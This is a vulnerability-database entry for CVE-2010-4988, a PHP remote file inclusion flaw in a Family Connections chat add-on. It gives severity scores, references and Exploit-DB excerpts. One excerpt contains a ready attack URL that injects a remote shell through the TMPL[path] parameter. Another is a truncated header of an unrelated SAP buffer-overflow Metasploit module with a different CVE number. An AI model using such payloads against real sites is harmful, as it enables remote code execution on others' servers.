CVE-2010-4988
Published 2011-11-01
Priority P347, high, 7.5 (CVSS 2.0)
CVSS vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.41% (82.1th percentile)
PHP remote file inclusion vulnerability in mod_chatting/themes/default/header.php in Family Connections Who is Chatting 2.2.3 allows remote attackers to execute arbitrary PHP code via a URL in the TMPL[path] parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| familycms | family_connections_who_is_chatting | — | — |
No detection rules found.
Exploit-DB
SAP Business One License Manager 2005 - Remote Buffer Overflow (Metasploit)
exploitdb · 2010-11-30 · CVE-2009-4988
---
##
# $Id: sap_2005_license.rb 11180 2010-11-30 20:19:18Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'SAP Business One License Manager 2005 Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the SAP Business One 2005
License Manager 'NT Naming Service' A and B releases. By sending an
excessively long string the stack is overwritten enabling arbitrary
code execution.
},
'Author' => 'Jacopo Cervini',
'Version' => '$Re
Exploit-DB
Family Connections Who is Chatting AddOn - Remote File Inclusion
exploitdb · 2010-07-03 · CVE-2010-4988
---
Who is Chatting 2.2.3 Remote File Include Vulnerability
# Author : lumut--
# Script Details : http://www.familycms.com/downloads/details.php?file=50
# Bugs :
# Expl: http://server/mod_chatting/themes/default/header.php?TMPL[path]=[shell]
# Greetz & Thanks: cr4wl3r, team_elite, kisame, virusfree, doniskynet, manadocoding*
No writeups or analysis indexed.
References
http://www.exploit-db.com/exploits/14186
http://www.securityfocus.com/bid/41346
http://www.vupen.com/english/advisories/2010/1687
https://exchange.xforce.ibmcloud.com/vulnerabilities/60057